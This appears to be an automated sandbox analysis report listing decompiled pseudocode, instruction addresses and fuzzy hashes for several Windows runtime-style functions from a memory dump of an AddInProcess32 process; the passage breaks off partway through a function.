Instruction Fuzzy Hash: 063122B6604606EBDB21EF5CC4C0BA673B4FF59314F040078ED48DB206EB74DA068B81

Uniqueness

Uniqueness Score: -1.00%

Function 01859100 Relevance: .1, Instructions: 87
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E01859100(signed int __ebx, void* __ecx, void* __edi, signed int __esi, void* __eflags) {
				signed int _t53;
				signed int _t56;
				signed int* _t60;
				signed int _t63;
				signed int _t66;
				signed int _t69;
				void* _t70;
				intOrPtr* _t72;
				void* _t78;
				void* _t79;
				signed int _t80;
				intOrPtr _t82;
				void* _t85;
				void* _t88;
				void* _t89;

				_t84 = __esi;
				_t70 = __ecx;
				_t68 = __ebx;
				_push(0x2c);
				_push(0x192f6e8);
				E018AD0E8(__ebx, __edi, __esi);
				 *((char*)(_t85 - 0x1d)) = 0;
				_t82 =  *((intOrPtr*)(_t85 + 8));
				if(_t82 == 0) {
					L4:
					if( *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) == 0) {
						E019288F5(_t68, _t70, _t78, _t82, _t84, __eflags);
					}
					L5:
					return E018AD130(_t68, _t82, _t84);
				}
				_t88 = _t82 -  *0x19486c0; // 0x12e07b0
				if(_t88 == 0) {
					goto L4;
				}
				_t89 = _t82 -  *0x19486b8; // 0x0
				if(_t89 == 0 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					goto L4;
				} else {
					E01872280(_t82 + 0xe0, _t82 + 0xe0);
					 *(_t85 - 4) =  *(_t85 - 4) & 0x00000000;
					__eflags =  *((char*)(_t82 + 0xe5));
					if(__eflags != 0) {
						E019288F5(__ebx, _t70, _t78, _t82, __esi, __eflags);
						goto L12;
					} else {
						__eflags =  *((char*)(_t82 + 0xe4));
						if( *((char*)(_t82 + 0xe4)) == 0) {
							 *((char*)(_t82 + 0xe4)) = 1;
							_push(_t82);
							_push( *((intOrPtr*)(_t82 + 0x24)));
							E0189AFD0();
						}
						while(1) {
							_t60 = _t82 + 8;
							 *(_t85 - 0x2c) = _t60;
							_t68 =  *_t60;
							_t80 = _t60[1];
							 *(_t85 - 0x28) = _t68;
							 *(_t85 - 0x24) = _t80;
							while(1) {
								L10:
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t84 = _t68;
								 *(_t85 - 0x30) = _t80;
								 *(_t85 - 0x24) = _t80 - 1;
								asm("lock cmpxchg8b [edi]");
								_t68 = _t84;
								 *(_t85 - 0x28) = _t68;
								 *(_t85 - 0x24) = _t80;
								__eflags = _t68 - _t84;
								_t82 =  *((intOrPtr*)(_t85 + 8));
								if(_t68 != _t84) {
									continue;
								}
								__eflags = _t80 -  *(_t85 - 0x30);
								if(_t80 !=  *(_t85 - 0x30)) {
									continue;
								}
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t63 = 0;
								 *(_t85 - 0x34) = 0;
								_t84 = 0;
								__eflags = 0;
								while(1) {
									 *(_t85 - 0x3c) = _t84;
									__eflags = _t84 - 3;
									if(_t84 >= 3) {
										break;
									}
									__eflags = _t63;
									if(_t63 != 0) {
										L40:
										_t84 =  *_t63;
										__eflags = _t84;
										if(_t84 != 0) {
											_t84 =  *(_t84 + 4);
											__eflags = _t84;
											if(_t84 != 0) {
												 *0x194b1e0(_t63, _t82);
												 *_t84();
											}
										}
										do {
											_t60 = _t82 + 8;
											 *(_t85 - 0x2c) = _t60;
											_t68 =  *_t60;
											_t80 = _t60[1];
											 *(_t85 - 0x28) = _t68;
											 *(_t85 - 0x24) = _t80;
											goto L10;
										} while (_t63 == 0);
										goto L40;
									}
									_t69 = 0;
									__eflags = 0;
									while(1) {
										 *(_t85 - 0x38) = _t69;
										__eflags = _t69 -  *0x19484c0;
										if(_t69 >=  *0x19484c0) {
											break;
										}
										__eflags = _t63;
										if(_t63 != 0) {
											break;
										}
										_t66 = E01929063(_t69 * 0xc +  *((intOrPtr*)(_t82 + 0x10 + _t84 * 4)), _t80, _t82);
										__eflags = _t66;
										if(_t66 == 0) {
											_t63 = 0;
											__eflags = 0;
										} else {
											_t63 = _t66 + 0xfffffff4;
										}
										 *(_t85 - 0x34) = _t63;
										_t69 = _t69 + 1;
									}
									_t84 = _t84 + 1;
								}
								__eflags = _t63;
							}
							 *((intOrPtr*)(_t82 + 0xf4)) =  *((intOrPtr*)(_t85 + 4));
							 *((char*)(_t82 + 0xe5)) = 1;
							 *((char*)(_t85 - 0x1d)) = 1;
							L12:
							 *(_t85 - 4) = 0xfffffffe;
							E0185922A(_t82);
							_t53 = E01877D50();
							__eflags = _t53;
							if(_t53 != 0) {
								_t56 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
							} else {
								_t56 = 0x7ffe0386;
							}
							__eflags =  *_t56;
							if( *_t56 != 0) {
								_t56 = E01928B58(_t82);
							}
							__eflags =  *((char*)(_t85 - 0x1d));
							if( *((char*)(_t85 - 0x1d)) != 0) {
								__eflags = _t82 -  *0x19486c0; // 0x12e07b0
								if(__eflags != 0) {
									__eflags = _t82 -  *0x19486b8; // 0x0
									if(__eflags == 0) {
										_t79 = 0x19486bc;
										_t72 = 0x19486b8;
										goto L18;
									}
									__eflags = _t56 | 0xffffffff;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										E01859240(_t68, _t82, _t82, _t84, __eflags);
									}
								} else {
									_t79 = 0x19486c4;
									_t72 = 0x19486c0;
									L18:
									E01889B82(_t68, _t72, _t79, _t82, _t84, __eflags);
								}
							}
							goto L5;
						}
					}
				}
			}

0x01859100
0x01859100
0x01859100
0x01859100
0x01859102
0x01859107
0x0185910c
0x01859110
0x01859115
0x01859136
0x01859143
0x018b37e4
0x018b37e4
0x01859149
0x0185914e
0x0185914e
0x01859117
0x0185911d
0x00000000
0x00000000
0x0185911f
0x01859125
0x00000000
0x01859151
0x01859158
0x0185915d
0x01859161
0x01859168
0x018b3715
0x00000000
0x0185916e
0x0185916e
0x01859175
0x01859177
0x0185917e
0x0185917f
0x01859182
0x01859182
0x01859187
0x01859187
0x0185918a
0x0185918d
0x0185918f
0x01859192
0x01859195
0x01859198
0x01859198
0x01859198
0x0185919a
0x00000000
0x00000000
0x018b371f
0x018b3721
0x018b3727
0x018b372f
0x018b3733
0x018b3735
0x018b3738
0x018b373b
0x018b373d
0x018b3740
0x00000000
0x00000000
0x018b3746
0x018b3749
0x00000000
0x00000000
0x018b374f
0x018b3751
0x00000000
0x00000000
0x018b3757
0x018b3759
0x018b375c
0x018b375c
0x018b375e
0x018b375e
0x018b3761
0x018b3764
0x00000000
0x00000000
0x018b3766
0x018b3768
0x018b37a3
0x018b37a3
0x018b37a5
0x018b37a7
0x018b37ad
0x018b37b0
0x018b37b2
0x018b37bc
0x018b37c2
0x018b37c2
0x018b37b2
0x01859187
0x01859187
0x0185918a
0x0185918d
0x0185918f
0x01859192
0x01859195
0x00000000
0x01859195
0x00000000
0x01859187
0x018b376a
0x018b376a
0x018b376c
0x018b376c
0x018b376f
0x018b3775
0x00000000
0x00000000
0x018b3777
0x018b3779
0x00000000
0x00000000
0x018b3782
0x018b3787
0x018b3789
0x018b3790
0x018b3790
0x018b378b
0x018b378b
0x018b378b
0x018b3792
0x018b3795
0x018b3795
0x018b3798
0x018b3798
0x018b379b
0x018b379b
0x018591a3
0x018591a9
0x018591b0
0x018591b4
0x018591b4
0x018591bb
0x018591c0
0x018591c5
0x018591c7
0x018b37da
0x018591cd
0x018591cd
0x018591cd
0x018591d2
0x018591d5
0x01859239
0x01859239
0x018591d7
0x018591db
0x018591e1
0x018591e7
0x018591fd
0x01859203
0x0185921e
0x01859223
0x00000000
0x01859223
0x01859205
0x01859208
0x0185920c
0x01859214
0x01859214
0x018591e9
0x018591e9
0x018591ee
0x018591f3
0x018591f3
0x018591f3
0x018591e7
0x00000000
0x018591db
0x01859187
0x01859168

Memory Dump Source

Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true

Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8195678506a28aa8d1c982b00bb57b7e853a4690abc4b323e8a045311d3ef556
Instruction ID: 5eaeadaf9a5b216dbca105da2b98d6a591436647e9c6b03adc9f4530f280f696
Opcode Fuzzy Hash: 8195678506a28aa8d1c982b00bb57b7e853a4690abc4b323e8a045311d3ef556
Instruction Fuzzy Hash: B631C775D41A55DFDBA1DBACC088BACBBF1FB44358F18815DC818E7241C338AA40C752

Uniqueness

Uniqueness Score: -1.00%

Function 01881DB5 Relevance: .1, Instructions: 87
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E01881DB5(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr* _v20;
				void* _t22;
				char _t23;
				void* _t36;
				intOrPtr _t42;
				intOrPtr _t43;

				_v12 = __ecx;
				_t43 = 0;
				_v20 = __edx;
				_t42 =  *__edx;
				 *__edx = 0;
				_v16 = _t42;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(6);
				_push(0);
				_push(__ecx);
				_t36 = ((0 | __ecx !=  *((intOrPtr*)( *[fs:0x30] + 8))) - 0x00000001 & 0xc0000000) + 0x40000002;
				_push(_t36);
				_t22 = E0187F460();
				if(_t22 < 0) {
					if(_t22 == 0xc0000023) {
						goto L1;
					}
					L3:
					return _t43;
				}
				L1:
				_t23 = _v8;
				if(_t23 != 0) {
					_t38 = _a4;
					if(_t23 >  *_a4) {
						_t42 = L01874620(_t38,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t23);
						if(_t42 == 0) {
							goto L3;
						}
						_t23 = _v8;
					}
					_push( &_v8);
					_push(_t23);
					_push(_t42);
					_push(6);
					_push(_t43);
					_push(_v12);
					_push(_t36);
					if(E0187F460() < 0) {
						if(_t42 != 0 && _t42 != _v16) {
							L018777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t43, _t42);
						}
						goto L3;
					}
					 *_v20 = _t42;
					 *_a4 = _v8;
				}
				_t43 = 1;
				goto L3;
			}

0x01881dc2
0x01881dc5
0x01881dc7
0x01881dcc
0x01881dce
0x01881dd6
0x01881ddf
0x01881de0
0x01881de1
0x01881de5
0x01881de8
0x01881def
0x01881df0
0x01881df6
0x01881df7
0x01881dfe
0x01881e1a
0x00000000
0x00000000
0x01881e0b
0x01881e12
0x01881e12
0x01881e00
0x01881e00
0x01881e05
0x01881e1e
0x01881e23
0x018c570f
0x018c5713
0x00000000
0x00000000
0x018c5719
0x018c5719
0x01881e2c
0x01881e2d
0x01881e2e
0x01881e2f
0x01881e31
0x01881e32
0x01881e35
0x01881e3d
0x018c5723
0x018c573d
0x018c573d
0x00000000
0x018c5723
0x01881e49
0x01881e4e
0x01881e4e
0x01881e09
0x00000000

Memory Dump Source

Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true

Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
Instruction ID: cee9ce2ed4496019d22755bc55f808b215b014c9d026363fa03ea72291b6a043
Opcode Fuzzy Hash: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
Instruction Fuzzy Hash: 18217F72600119EFD721DF59CC88EAABBB9FF85B54F114055EA05D7250DA34EF02C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 018D6C0A Relevance: .1, Instructions: 79
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E018D6C0A(signed short* __ecx, signed char __edx, signed char _a4, signed char _a8) {
				signed short* _v8;
				signed char _v12;
				void* _t22;
				signed char* _t23;
				intOrPtr _t24;
				signed short* _t44;
				void* _t47;
				signed char* _t56;
				signed char* _t58;

				_t48 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t44 = __ecx;
				_v12 = __edx;
				_v8 = __ecx;
				_t22 = E01877D50();
				_t58 = 0x7ffe0384;
				if(_t22 == 0) {
					_t23 = 0x7ffe0384;
				} else {
					_t23 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				}
				if( *_t23 != 0) {
					_t24 =  *0x1947b9c; // 0x0
					_t47 = ( *_t44 & 0x0000ffff) + 0x30;
					_t23 = L01874620(_t48,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t24 + 0x180000, _t47);
					_t56 = _t23;
					if(_t56 != 0) {
						_t56[0x24] = _a4;
						_t56[0x28] = _a8;
						_t56[6] = 0x1420;
						_t56[0x20] = _v12;
						_t14 =  &(_t56[0x2c]); // 0x2c
						E0189F3E0(_t14, _v8[2],  *_v8 & 0x0000ffff);
						_t56[0x2c + (( *_v8 & 0x0000ffff) >> 1) * 2] = 0;
						if(E01877D50() != 0) {
							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						}
						_push(_t56);
						_push(_t47 - 0x20);
						_push(0x402);
						_push( *_t58 & 0x000000ff);
						E01899AE0();
						_t23 = L018777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t56);
					}
				}
				return _t23;
			}

0x018d6c0a
0x018d6c0f
0x018d6c10
0x018d6c13
0x018d6c15
0x018d6c19
0x018d6c1c
0x018d6c21
0x018d6c28
0x018d6c3a
0x018d6c2a
0x018d6c33
0x018d6c33
0x018d6c3f
0x018d6c48
0x018d6c4d
0x018d6c60
0x018d6c65
0x018d6c69
0x018d6c73
0x018d6c79
0x018d6c7f
0x018d6c86
0x018d6c90
0x018d6c94
0x018d6ca6
0x018d6cb2
0x018d6cbd
0x018d6cbd
0x018d6cc3
0x018d6cc7
0x018d6ccb
0x018d6cd0
0x018d6cd1
0x018d6ce2
0x018d6ce2
0x018d6c69
0x018d6ced

Memory Dump Source

Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true

Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f858f2a845746ba1f8cf52d8b84730464d8d210f551c8928a4122fe19eace8fb
Instruction ID: fae8120454439acb8270e6000d10c58398199f801d8b6569ec7e35dfa672ca07
Opcode Fuzzy Hash: f858f2a845746ba1f8cf52d8b84730464d8d210f551c8928a4122fe19eace8fb
Instruction Fuzzy Hash: DA218BB1A00649AFD715DB6CD884E6ABBB8FF48744F140069F904D7791E634EE50CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 018990AF Relevance: .1, Instructions: 76
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E018990AF(intOrPtr __ecx, void* __edx, intOrPtr* _a4) {
				intOrPtr* _v0;
				void* _v8;
				signed int _v12;
				intOrPtr _v16;
				char _v36;
				void* _t38;
				intOrPtr _t41;
				void* _t44;
				signed int _t45;
				intOrPtr* _t49;
				signed int _t57;
				signed int _t58;
				intOrPtr* _t59;
				void* _t62;
				void* _t63;
				void* _t65;
				void* _t66;
				signed int _t69;
				intOrPtr* _t70;
				void* _t71;
				intOrPtr* _t72;
				intOrPtr* _t73;
				char _t74;

				_t65 = __edx;
				_t57 = _a4;
				_t32 = __ecx;
				_v8 = __edx;
				_t3 = _t32 + 0x14c; // 0x14c
				_t70 = _t3;
				_v16 = __ecx;
				_t72 =  *_t70;
				while(_t72 != _t70) {
					if( *((intOrPtr*)(_t72 + 0xc)) != _t57) {
						L24:
						_t72 =  *_t72;
						continue;
					}
					_t30 = _t72 + 0x10; // 0x10
					if(E018AD4F0(_t30, _t65, _t57) == _t57) {
						return 0xb7;
					}
					_t65 = _v8;
					goto L24;
				}
				_t61 = _t57;
				_push( &_v12);
				_t66 = 0x10;
				if(E0188E5E0(_t57, _t66) < 0) {
					return 0x216;
				}
				_t73 = L01874620(_t61,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v12);
				if(_t73 == 0) {
					_t38 = 0xe;
					return _t38;
				}
				_t9 = _t73 + 0x10; // 0x10
				 *((intOrPtr*)(_t73 + 0xc)) = _t57;
				E0189F3E0(_t9, _v8, _t57);
				_t41 =  *_t70;
				if( *((intOrPtr*)(_t41 + 4)) != _t70) {
					_t62 = 3;
					asm("int 0x29");
					_push(_t62);
					_push(_t57);
					_push(_t73);
					_push(_t70);
					_t71 = _t62;
					_t74 = 0;
					_v36 = 0;
					_t63 = E0188A2F0(_t62, _t71, 1, 6,  &_v36);
					if(_t63 == 0) {
						L20:
						_t44 = 0x57;
						return _t44;
					}
					_t45 = _v12;
					_t58 = 0x1c;
					if(_t45 < _t58) {
						goto L20;
					}
					_t69 = _t45 / _t58;
					if(_t69 == 0) {
						L19:
						return 0xe8;
					}
					_t59 = _v0;
					do {
						if( *((intOrPtr*)(_t63 + 0xc)) != 2) {
							goto L18;
						}
						_t49 =  *((intOrPtr*)(_t63 + 0x14)) + _t71;
						 *_t59 = _t49;
						if( *_t49 != 0x53445352) {
							goto L18;
						}
						 *_a4 =  *((intOrPtr*)(_t63 + 0x10));
						return 0;
						L18:
						_t63 = _t63 + 0x1c;
						_t74 = _t74 + 1;
					} while (_t74 < _t69);
					goto L19;
				}
				 *_t73 = _t41;
				 *((intOrPtr*)(_t73 + 4)) = _t70;
				 *((intOrPtr*)(_t41 + 4)) = _t73;
				 *_t70 = _t73;
				 *(_v16 + 0xdc) =  *(_v16 + 0xdc) | 0x00000010;
				return 0;
			}

0x018990af
0x018990b8
0x018990bb
0x018990bf
0x018990c2
0x018990c2
0x018990c8
0x018990cb
0x018990cd
0x018d14d7
0x018d14eb
0x018d14eb
0x00000000
0x018d14eb
0x018d14db
0x018d14e6
0x00000000
0x018d14f2
0x018d14e8
0x00000000
0x018d14e8
0x018990d8
0x018990da
0x018990dd
0x018990e5
0x00000000
0x01899139
0x018990fa
0x018990fe
0x01899142
0x00000000
0x01899142
0x01899104
0x01899107
0x0189910b
0x01899110
0x01899118
0x01899147
0x01899148
0x0189914f
0x01899150
0x01899151
0x01899152
0x01899156
0x0189915d
0x01899160
0x01899168
0x0189916c
0x018991bc
0x018991be
0x00000000
0x018991be
0x0189916e
0x01899173
0x01899176
0x00000000
0x00000000
0x0189917c
0x01899180
0x018991b5
0x00000000
0x018991b5
0x01899182
0x01899185
0x01899189
0x00000000
0x00000000
0x0189918e
0x01899190
0x01899198
0x00000000
0x00000000
0x018991a0
0x00000000
0x018991ad
0x018991ad
0x018991b0
0x018991b1
0x00000000
0x01899185
0x0189911a
0x0189911c
0x0189911f
0x01899125
0x01899127
0x00000000

Memory Dump Source

Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true

Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
Instruction ID: 2a92fbf8a4be7cc91be06faf2683c17ed7be17b2fa8497005e000b662f8692fd
Opcode Fuzzy Hash: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
Instruction Fuzzy Hash: C62171B1A00709EFDB21DF59C885A6ABBF8EF54314F14846EE949D7211D334EE408B50

Uniqueness

Uniqueness Score: -1.00%

Function 01883B7A Relevance: .1, Instructions: 75
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E01883B7A(void* __ecx) {
				signed int _v8;
				char _v12;
				intOrPtr _v20;
				intOrPtr _t17;
				intOrPtr _t26;
				void* _t35;
				void* _t38;
				void* _t41;
				intOrPtr _t44;

				_t17 =  *0x19484c4; // 0x0
				_v12 = 1;
				_v8 =  *0x19484c0 * 0x4c;
				_t41 = __ecx;
				_t35 = L01874620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t17 + 0x000c0000 | 0x00000008,  *0x19484c0 * 0x4c);
				if(_t35 == 0) {
					_t44 = 0xc0000017;
				} else {
					_push( &_v8);
					_push(_v8);
					_push(_t35);
					_push(4);
					_push( &_v12);
					_push(0x6b);
					_t44 = E0189AA90();
					_v20 = _t44;
					if(_t44 >= 0) {
						E0189FA60( *((intOrPtr*)(_t41 + 0x20)), 0,  *0x19484c0 * 0xc);
						_t38 = _t35;
						if(_t35 < _v8 + _t35) {
							do {
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t38 = _t38 +  *((intOrPtr*)(_t38 + 4));
							} while (_t38 < _v8 + _t35);
							_t44 = _v20;
						}
					}
					_t26 =  *0x19484c4; // 0x0
					L018777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t26 + 0xc0000, _t35);
				}
				return _t44;
			}

0x01883b89
0x01883b96
0x01883ba1
0x01883bab
0x01883bb5
0x01883bb9
0x018c6298
0x01883bbf
0x01883bc2
0x01883bc3
0x01883bc9
0x01883bca
0x01883bcc
0x01883bcd
0x01883bd4
0x01883bd6
0x01883bdb
0x01883bea
0x01883bf7
0x01883bfb
0x01883bff
0x01883c09
0x01883c0a
0x01883c0b
0x01883c0f
0x01883c14
0x01883c18
0x01883c18
0x01883bfb
0x01883c1b
0x01883c30
0x01883c30
0x01883c3d

Memory Dump Source

Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true

Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e9b3bc90d422a9610b52a7d18a01c1f1686ba410fee3910d784e8bec9b9c2b97
Instruction ID: 50dda1982353a7a631cb39c941f05c2866a6a59c735af10fa18aa2ada1dd75dd
Opcode Fuzzy Hash: e9b3bc90d422a9610b52a7d18a01c1f1686ba410fee3910d784e8bec9b9c2b97
Instruction Fuzzy Hash: 50218072600109AFD715EF98CD81F5ABBBDFB44B48F150068EA04EB251D371EE01DB94

Uniqueness

Uniqueness Score: -1.00%

Function 018D6CF0 Relevance: .1, Instructions: 74
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E018D6CF0(void* __edx, intOrPtr _a4, short _a8) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v28;
				char _v36;
				char _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char* _t21;
				void* _t24;
				void* _t36;
				void* _t38;
				void* _t46;

				_push(_t36);
				_t46 = __edx;
				_v12 = 0;
				_v8 = 0;
				_v20 = 0;
				_v16 = 0;
				if(E01877D50() == 0) {
					_t21 = 0x7ffe0384;
				} else {
					_t21 = ( *[fs:0x30])[0x50] + 0x22a;
				}
				if( *_t21 != 0) {
					_t21 =  *[fs:0x30];
					if((_t21[0x240] & 0x00000004) != 0) {
						if(E01877D50() == 0) {
							_t21 = 0x7ffe0385;
						} else {
							_t21 = ( *[fs:0x30])[0x50] + 0x22b;
						}
						if(( *_t21 & 0x00000020) != 0) {
							_t56 = _t46;
							if(_t46 == 0) {
								_t46 = 0x1835c80;
							}
							_push(_t46);
							_push( &_v12);
							_t24 = E0188F6E0(_t36, 0, _t46, _t56);
							_push(_a4);
							_t38 = _t24;
							_push( &_v28);
							_t21 = E0188F6E0(_t38, 0, _t46, _t56);
							if(_t38 != 0) {
								if(_t21 != 0) {
									E018D7016(_a8, 0, 0, 0,  &_v36,  &_v28);
									L01872400( &_v52);
								}
								_t21 = L01872400( &_v28);
							}
						}
					}
				}
				return _t21;
			}

0x018d6cfb
0x018d6d00
0x018d6d02
0x018d6d06
0x018d6d0a
0x018d6d0e
0x018d6d19
0x018d6d2b
0x018d6d1b
0x018d6d24
0x018d6d24
0x018d6d33
0x018d6d39
0x018d6d46
0x018d6d4f
0x018d6d61
0x018d6d51
0x018d6d5a
0x018d6d5a
0x018d6d69
0x018d6d6b
0x018d6d6d
0x018d6d6f
0x018d6d6f
0x018d6d74
0x018d6d79
0x018d6d7a
0x018d6d7f
0x018d6d82
0x018d6d88
0x018d6d89
0x018d6d90
0x018d6d94
0x018d6da7
0x018d6db1
0x018d6db1
0x018d6dbb
0x018d6dbb
0x018d6d90
0x018d6d69
0x018d6d46
0x018d6dc6

Memory Dump Source

Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true

Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 33a908e5fde82a4bb19ef66bdcd1c69910a89b3fb7f77fab5798354d6fcaa848
Instruction ID: c4a7891f63ea3c7311cbb3e1e2945686483262c3a1a8d26c89f108035687eb2a
Opcode Fuzzy Hash: 33a908e5fde82a4bb19ef66bdcd1c69910a89b3fb7f77fab5798354d6fcaa848
Instruction Fuzzy Hash: FB2100324003499BD721EF2CD944B6BBBECEF91384F180556FA40C7250E735CB48C6A2

Uniqueness

Uniqueness Score: -1.00%

Function 0192070D Relevance: .1, Instructions: 72
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E0192070D(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				char _v8;
				intOrPtr _v11;
				signed int _v12;
				intOrPtr _v15;
				signed int _v16;
				intOrPtr _v28;
				void* __ebx;
				char* _t32;
				signed int* _t38;
				signed int _t60;

				_t38 = __ecx;
				_v16 = __edx;
				_t60 = E019207DF(__ecx, __edx,  &_a4,  &_a8, 2);
				if(_t60 != 0) {
					_t7 = _t38 + 0x38; // 0x29cd5903
					_push( *_t7);
					_t9 = _t38 + 0x34; // 0x6adeeb00
					_push( *_t9);
					_v12 = _a8 << 0xc;
					_t11 = _t38 + 4; // 0x5de58b5b
					_push(0x4000);
					_v8 = (_a4 << 0xc) + (_v16 - ( *__ecx & _v16) >> 4 <<  *_t11) + ( *__ecx & _v16);
					E0191AFDE( &_v8,  &_v12);
					E01921293(_t38, _v28, _t60);
					if(E01877D50() == 0) {
						_t32 = 0x7ffe0380;
					} else {
						_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						_t21 = _t38 + 0x3c; // 0xc3595e5f
						E019114FB(_t38,  *_t21, _v11, _v15, 0xd);
					}
				}
				return  ~_t60;
			}

0x0192071b
0x01920724
0x01920734
0x01920738
0x0192074b
0x0192074b
0x01920753
0x01920753
0x01920759
0x0192075d
0x01920774
0x01920779
0x0192077d
0x01920789
0x01920795
0x019207a7
0x01920797
0x019207a0
0x019207a0
0x019207af
0x019207c4
0x019207cd
0x019207cd
0x019207af
0x019207dc

Memory Dump Source

Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true

Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
Instruction ID: 9ab446f4cf570c3770c000c6589093a51e20ffa256de6128d30ee335dbfab758
Opcode Fuzzy Hash: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
Instruction Fuzzy Hash: 5C21F236204214AFD705DF2CCC84A6ABBA9EBD4750F088569F9998B389D730D909CB91

Uniqueness

Uniqueness Score: -1.00%

Function 018D7794 Relevance: .1, Instructions: 70
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E018D7794(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, unsigned int _a8, void* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _t21;
				void* _t24;
				intOrPtr _t25;
				void* _t36;
				short _t39;
				signed char* _t42;
				unsigned int _t46;
				void* _t50;

				_push(__ecx);
				_push(__ecx);
				_t21 =  *0x1947b9c; // 0x0
				_t46 = _a8;
				_v12 = __edx;
				_v8 = __ecx;
				_t4 = _t46 + 0x2e; // 0x2e
				_t36 = _t4;
				_t24 = L01874620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t21 + 0x180000, _t36);
